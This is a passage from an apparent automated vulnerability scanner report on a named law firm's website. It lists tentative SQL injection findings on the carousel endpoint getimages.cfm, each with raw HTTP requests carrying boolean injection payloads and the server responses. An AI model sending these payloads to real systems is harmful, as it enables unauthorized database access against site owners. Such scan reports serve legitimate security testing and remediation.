first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no&112395009%20or%201%3d1--%20=1

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 237

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no&112395009%20or%201%3d2--%20=1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.42. http://www.curtis.com/scripts/carousel/getimages.cfm [next_prev_buttons parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The next_prev_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 15232388'%20or%201%3d1--%20 and 15232388'%20or%201%3d2--%20 were each submitted in the next_prev_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no15232388'%20or%201%3d1--%20&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no15232388'%20or%201%3d2--%20&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.43. http://www.curtis.com/scripts/carousel/getimages.cfm [pause_button parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The pause_button parameter appears to be vulnerable to SQL injection attacks. The payloads 17457857'%20or%201%3d1--%20 and 17457857'%20or%201%3d2--%20 were each submitted in the pause_button parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no17457857'%20or%201%3d1--%20&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no17457857'%20or%201%3d2--%20&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.44. http://www.curtis.com/scripts/carousel/getimages.cfm [sifrFetch cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 87614863'%20or%201%3d1--%20 and 87614863'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true87614863'%20or%201%3d1--%20
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Wed, 21-Apr-2010 12:09:25 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true87614863'%20or%201%3d2--%20
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slid
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:09:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.45. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_buttons parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_buttons parameter appears to be vulnerable to SQL injection attacks. The payloads 11199147'%20or%201%3d1--%20 and 11199147'%20or%201%3d2--%20 were each submitted in the slide_buttons parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no11199147'%20or%201%3d1--%20&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
<script language="javascript" type="text/javascript" src="scripts/nyroModal/nyroModal.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/carousel/carousel.css" type="text/css">


<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearch"].keyword.focus();
       return false;
       }
   }
function checkSearchFormAttorney(){
    if((document.form
...[SNIP]...

Request 2

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no11199147'%20or%201%3d2--%20&slide_captions=no&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<div id='slide_holder_inner'>

<div id='row_of_slides'>
<div class='slide' id='slide_1'><img src='/images/hprotation/hp_ny.jpg'></div>
<div class='slide' id='slide_2'><img src='/images/hprotation/hp_houston.jpg'></div>
<div class='slide' id='slide_3'><img src='/images/hprotation/hp_stamford.jpg'></div>
<div class='slide' id='slide_4'><img src='/images/hprotation/hp_dc.jpg'></div>
<div class='slide' id='slide_5'><img src='/images/hprotation/hp_almaty.jpg'></div>
<div class='slide' id='slide_6'><img src='/images/hprotation/hp_astana.jpg'></div>
<div class='slide' id='slide_7'><img src='/images/hprotation/hp_dubai.jpg'></div>
<div class='slide' id='slide_8'><img src='/images/hprotation/hp_frankfurt.jpg'></div>
<div class='slide' id='slide_9'><img src='/images/hprotation/hp_istanbul.jpg'></div>
<div class='slide' id='slide_10'><img src='/images/hprotation/hp_london.jpg'></div>
<div class='slide' id='slide_11'><img src='/images/hprotation/hp_mexicocity.jpg'></div>
<div class='slide' id='slide_12'><img src='/images/hprotation/hp_milan.jpg'></div>
<div class='slide' id='slide_13'><img src='/images/hprotation/hp_muscat.jpg'></div>
<div class='slide' id='slide_14'><img src='/images/hprotation/hp_france.jpg'></div>
</div>

</div>

1.46. http://www.curtis.com/scripts/carousel/getimages.cfm [slide_captions parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /scripts/carousel/getimages.cfm

Issue detail

The slide_captions parameter appears to be vulnerable to SQL injection attacks. The payloads 15534429'%20or%201%3d1--%20 and 15534429'%20or%201%3d2--%20 were each submitted in the slide_captions parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

POST /scripts/carousel/getimages.cfm HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
Origin: http://www.curtis.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=6175843; CFTOKEN=32575697; sifrFetch=true
Content-Length: 233

first_last_buttons=no&first_slide_is_intro=no&hover_next_prev_buttons=no&next_prev_buttons=no&pause_button=no&slide_buttons=no&slide_captions=no15534429'%20or%201%3d1--%20&slide_directory=slides&doctype=html&slide_links=no&slide_number_display=no&water_mark=no

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 12:08:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<link rel="stylesheet" href="scripts/general.css" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/menu.css" type="text/css" media="all" />
<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css"/>
<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />
<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>
<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="scripts/jquery.dimensions.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/carousel/carousel_behavior_min.js"></script>
